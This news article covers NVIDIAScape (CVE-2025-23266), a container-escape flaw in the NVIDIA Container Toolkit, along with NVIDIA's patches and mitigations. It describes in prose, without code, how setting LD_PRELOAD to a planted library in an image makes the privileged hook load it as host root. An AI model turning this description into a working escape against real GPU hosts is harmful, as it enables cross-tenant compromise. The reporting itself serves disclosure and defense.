Critical NVIDIA Container Toolkit Bug Lets Attackers Break Out of AI Containers

July 18, 2025

New flaw threatens the backbone of GPU‑powered cloud services

Cloud‑security firm Wiz has uncovered a serious weakness in the NVIDIA Container Toolkit (NCT) that could let a malicious container jump its fence and seize control of the underlying server. The issue, logged as CVE‑2025‑23266 and nicknamed “NVIDIAScape,” carries a near‑maximum CVSS score of 9.0, signalling that exploitation is both easy and damaging. NVIDIA confirmed the problem in a security bulletin and has released fixes, yet many hosts remain exposed because the vulnerable code sits at the heart of most managed AI and GPU offerings run by the major cloud providers.

What exactly went wrong?

The Container Toolkit is the small but crucial layer that tells a Linux container how to talk to NVIDIA GPUs. During start‑up, it registers an OCI “createContainer” hook that runs with elevated rights on the host. Wiz researchers noticed that this hook inherits every environment variable supplied by the user’s image. Because the hook also accepts the LD_PRELOAD variable, an attacker can point the hook at any shared library they smuggle into the image, tricking the privileged process into loading untrusted code. That design slip is all it takes for a container to burst through its namespace walls and grab root on the machine.

A three‑line Dockerfile is enough

In a proof‑of‑concept, Wiz showed that adding just three lines to a Dockerfile—copying a rogue .so file and setting LD_PRELOAD—is enough to trigger the escape. Because the hook’s working directory is the container’s root filesystem, no fancy path traversal is required; the library sits where the hook can reach it. Once loaded, the attacker’s code runs as the host’s root user, paving the way to install backdoors, exfiltrate data or tamper with other workloads. Wiz estimates that roughly 37 percent of cloud environments contain the vulnerable toolkit, meaning a sizable share of AI tenants could be at risk if a single customer turns hostile.

Why AI clouds feel the heat

GPU‑backed services typically pack many customers onto the same physical hardware to keep utilisation high. If one container breaks loose, every other tenant’s training data, fine‑tuned models and intellectual property stored on that host are suddenly exposed. The discovery echoes previous NCT bugs—such as CVE‑2024‑0132 and CVE‑2025‑23359—that allowed full host takeovers and highlights a pattern: classic “infrastructure” flaws often pose a more immediate threat to AI workloads than futuristic model‑level attacks. As Wiz puts it, containers offer convenience, not strong security boundaries, and multi‑tenant platforms should assume that escape bugs will surface again.

Patches and work‑arounds

NVIDIA has shipped Container Toolkit 1.17.8 and GPU Operator 25.3.1, which close the hole by tightening how hooks are invoked. Operators unable to upgrade right away can reduce risk by disabling the enable‑cuda‑compat hook through a simple config flag or Helm override; doing so removes the vulnerable path entirely, though at the cost of certain compatibility features. Both NVIDIA and Wiz urge cloud providers to patch urgently, especially on hosts that let customers supply their own images.

A reminder to layer defenses

NVIDIAScape reinforces an old lesson: rely on more than one wall. Virtual machines, micro‑VMs or hardware‑based isolation can prevent a single container bug from turning into a cross‑tenant breach. As AI adoption accelerates, the low‑level plumbing that couples containers, drivers and GPUs will keep expanding—and so will its attack surface. Staying ahead means treating that plumbing with the same scrutiny traditionally reserved for application code and applying defense‑in‑depth so that the next surprise flaw is a nuisance, not a crisis.